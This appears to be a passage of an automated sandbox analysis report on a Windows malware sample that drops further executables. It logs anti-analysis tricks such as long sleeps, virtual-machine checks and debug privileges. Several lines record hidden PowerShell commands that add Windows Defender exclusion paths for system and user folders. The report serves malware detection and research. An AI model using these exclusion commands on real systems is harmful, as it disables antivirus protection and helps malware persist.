Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Reka\rapnewsa.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_20-2494
Source: C:\Reka\rapnewsa.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_20-2583
Source: C:\Reka\rapnewsa.exeSystem information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: 3F80000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: 5CC0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: 7CC0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: B860000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: F860000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: FC30000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: 13C30000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_07D25B20 sldt word ptr [eax]0_2_07D25B20
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599859Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599734Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599625Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599516Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599391Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599281Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599169Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599062Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 598953Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 598844Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 598734Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 598625Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\UBONg7lmVR.exeWindow / User API: threadDelayed 3781Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeWindow / User API: threadDelayed 6123Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6521Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3211Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7983Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1642Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7025
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6307
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3417
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6614
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6864
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2771
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7545
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1962
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 5524Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -599859s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -599734s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -599625s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -599516s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -599391s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -599281s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -599169s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -599062s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -598953s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -598844s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -598734s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040Thread sleep time: -598625s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 5524Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000Thread sleep time: -11068046444225724s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2460Thread sleep count: 7025 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1632Thread sleep count: 2633 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3500Thread sleep count: 6307 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep count: 3417 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep count: 6614 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep count: 2896 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3356Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep count: 7545 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep count: 1962 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00238D40 FindFirstFileW,FindNextFileW,FindClose,20_2_00238D40
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00238CA0 GetSystemInfo,20_2_00238CA0
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599859Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599734Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599625Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599516Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599391Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599281Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599169Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 599062Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 598953Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 598844Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 598734Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 598625Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: UBONg7lmVR.exe, 00000000.00000002.4505274504.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: rapnewsa.exe, 00000014.00000002.2541747512.00000000016D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rapnewsa.exe, 00000014.00000002.2541747512.00000000016D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK
Source: rapnewsa.exe, 00000014.00000002.2541747512.000000000168E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: tfi0ts5v.qpg.exe, 00000003.00000002.2562920096.000001F2F2194000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Reka\rapnewsa.exeAPI call chain: ExitProcess graph end nodegraph_20-2510
Source: C:\Reka\rapnewsa.exeAPI call chain: ExitProcess graph end nodegraph_20-2504
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Reka\rapnewsa.exeCode function: 20_2_002317E0 GlobalHandle,LoadLibraryA,GetProcAddress,20_2_002317E0
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00231A20 mov eax, dword ptr fs:[00000030h]20_2_00231A20
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess created: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exeJump to behavior
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00238A80 cpuid 20_2_00238A80
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Users\user\Desktop\UBONg7lmVR.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
